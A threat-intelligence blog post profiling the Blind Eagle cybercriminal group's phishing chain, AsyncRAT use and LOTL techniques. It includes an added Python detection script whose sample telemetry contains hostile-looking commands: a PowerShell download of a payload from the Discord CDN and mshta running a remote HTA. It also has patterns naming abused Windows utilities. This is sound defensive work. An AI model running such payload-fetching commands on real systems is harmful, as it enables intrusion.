Hacker Spotlight: Blind Eagle


Phishing for Answers’ “Hacker Spotlight” is a series of posts analyzing different cybercriminal groups in Latin America. Each post will focus on a different adversary and provide details on each group’s operations, signature techniques, victimology, evolution, and recent campaigns. The objective of this series is to bring awareness to the cyber threat landscape in Latin America.


Overview

FUN FACT: Blind Eagle employs strict targeting and has been known to geolocate its victims. Their tendency to exclusively target South American countries is a distinguishing factor from other cybercriminal groups, which typically have a more randomized approach in their targeting.

Blind Eagle is one of the most sophisticated known cybercriminal groups operating in Latin America. The group is believed to be based in South America, given its use of regional Spanish dialects and intimate knowledge of local institutions. Although Blind Eagle tends to target victims based in South America (especially Colombia), its operations have impacted organizations in Australia, Europe, and the US. This threat actor’s campaigns often leverage spearphishing for initial access, deployment of encrypted payloads, commodity RATs, and “Living off the Land” (LOTL) techniques for persistence. At the time of this writing, Blind Eagle’s most recent publicly known operations were reported in April 2023.

Background Information

Evolution

The graphic below shows the evolution of Blind Eagle’s operations beginning from the group’s first reported activities until present day. This analysis, which is based on open-source data, shows how this adversary has matured in its targeting, methods of defense evasion, and operational complexity.

Recent Campaign: Chasing Colombia

One of Blind Eagle’s most recent campaigns was reported in February 2023. The group launched a cyberattack against Colombian victims in the health, financial, law enforcement, immigration, and human rights sectors. Blind Eagle gained initial access via its tried-and-true method: spearphishing. The phishing emails contained a password-protected PDF, and once users opened the document, a malicious file was downloaded from a Discord content delivery network (CDN). This file appeared to be a .PDF but was in fact a .UUE file (Blind Eagle has previously leveraged UUE files for defense evasion). An obfuscated VBS script within the file was then executed, launching an infection chain that eventually loaded the AsyncRAT malware into memory via process hollowing.

Blind Eagle’s latest operations demonstrate the continued evolution of the group. The adversary’s use of process hollowing and double file extensions indicates that the group is consistently updating its defense evasion tactics. Blind Eagle also continues to execute code through legitimate Windows command-line utilities, as seen in its abuse of the regsvcs and regasm utilities (in addition to its use of mshta in previous attacks). Blind Eagle is actively maturing and improving its tools, adding new LOTL techniques to its arsenal, and bypassing network defense solutions. Therefore, it is essential that the information security community continue to monitor this group’s activities.
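The infection chain and LOTL abuse described in the two paragraphs above translate directly into process-creation detections. The script below is an added example written for this post; it is not code from Phishing for Answers, MITRE, or any vendor. It runs four toy rules over constructed Sysmon-style process events: a double-extension lure such as `.pdf.uue`, a script host executing a `.vbs` from a user-writable directory, `regsvcs`/`regasm`/`mshta` launched from a script host (or `mshta` given a remote URL), and a command line that fetches from the Discord CDN. The event field names, the sample paths, and the `cdn.discordapp.com` hostname are assumptions made for illustration.

```python
"""Toy process-creation detections for the Blind Eagle tradecraft described above.
Added example, not from the original post. Field names, sample events and the
Discord CDN hostname are assumptions used for illustration only."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Windows utilities the post names as abused for "Living off the Land" execution.
LOTL_BINARIES = {"regsvcs.exe", "regasm.exe", "mshta.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# A document-looking extension immediately followed by an archive/script one,
# e.g. "factura.pdf.uue" (the double-extension trick the post describes).
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.(uue|vbs|js|exe|scr|hta)\b", re.IGNORECASE)
# Script payload sitting in a user-writable location (downloads, temp, profile).
USER_WRITABLE = re.compile(r"\\(downloads|temp|appdata)\\", re.IGNORECASE)
# Assumption: cdn.discordapp.com is the public hostname of the Discord CDN.
DISCORD_CDN = re.compile(r"https?://cdn\.discordapp\.com/", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str         # full path of the executed binary
    parent_image: str  # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> list[str]:
    """Return the names of every rule the event triggers, in a fixed order."""
    hits: list[str] = []
    image = basename(event.image)
    parent = basename(event.parent_image)
    cmd = event.command_line

    # Rule 1: double-extension lure anywhere in the command line.
    if DOUBLE_EXT.search(cmd):
        hits.append("double_extension_file")

    # Rule 2: wscript/cscript running a .vbs out of a user-writable directory.
    if image in SCRIPT_HOSTS and re.search(r"\.vbs\b", cmd, re.IGNORECASE) and USER_WRITABLE.search(cmd):
        hits.append("script_host_user_dir")

    # Rule 3: regsvcs/regasm/mshta spawned by a script host or PowerShell, or
    # mshta handed a remote URL (both are LOTL execution patterns named above).
    if image in LOTL_BINARIES and (
        parent in SCRIPT_HOSTS | {"powershell.exe"} or (image == "mshta.exe" and REMOTE_URL.search(cmd))
    ):
        hits.append("lotl_utility_abuse")

    # Rule 4: payload retrieval from the Discord CDN.
    if DISCORD_CDN.search(cmd):
        hits.append("discord_cdn_download")

    return hits


def scan(events: list[ProcessEvent]) -> list[list[str]]:
    """Evaluate every event; result i holds the rule hits for events[i]."""
    return [evaluate(e) for e in events]


# Constructed sample telemetry (not real IoCs): one benign event, then the
# stages the post describes - lure script, LOTL utility, CDN fetch, remote HTA.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
                 r'notepad.exe "C:\Users\ana\notas.txt"'),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
                 r'wscript.exe "C:\Users\ana\Downloads\factura.pdf.vbs"'),
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
                 r"C:\Windows\System32\wscript.exe", r'regsvcs.exe "C:\Users\ana\AppData\Local\Temp\x.dll"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wscript.exe",
                 "powershell.exe -c Invoke-WebRequest https://cdn.discordapp.com/attachments/123/456/factura.pdf.uue"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta.exe https://cdn.discordapp.com/attachments/123/456/run.hta"),
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{basename(event.image):<16} {hits or 'clean'}")
```

The rules are deliberately narrow; in production they would be backed by the full parent/child chain and file-origin metadata rather than command-line string matching, and each rule maps to one stage of the chain so an analyst can see which stage fired.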



Interested in learning more about Blind Eagle? Check out Kate Esprit and Cat Self’s Black Hat 2023 presentation, Becoming a Dark Knight: Adversary Emulation Demonstration for ATT&CK Evaluations, and the associated repository on GitHub.

Approved for Public Release; Distribution Unlimited 23-02410-1. ©2023 The MITRE Corporation. ALL RIGHTS RESERVED.

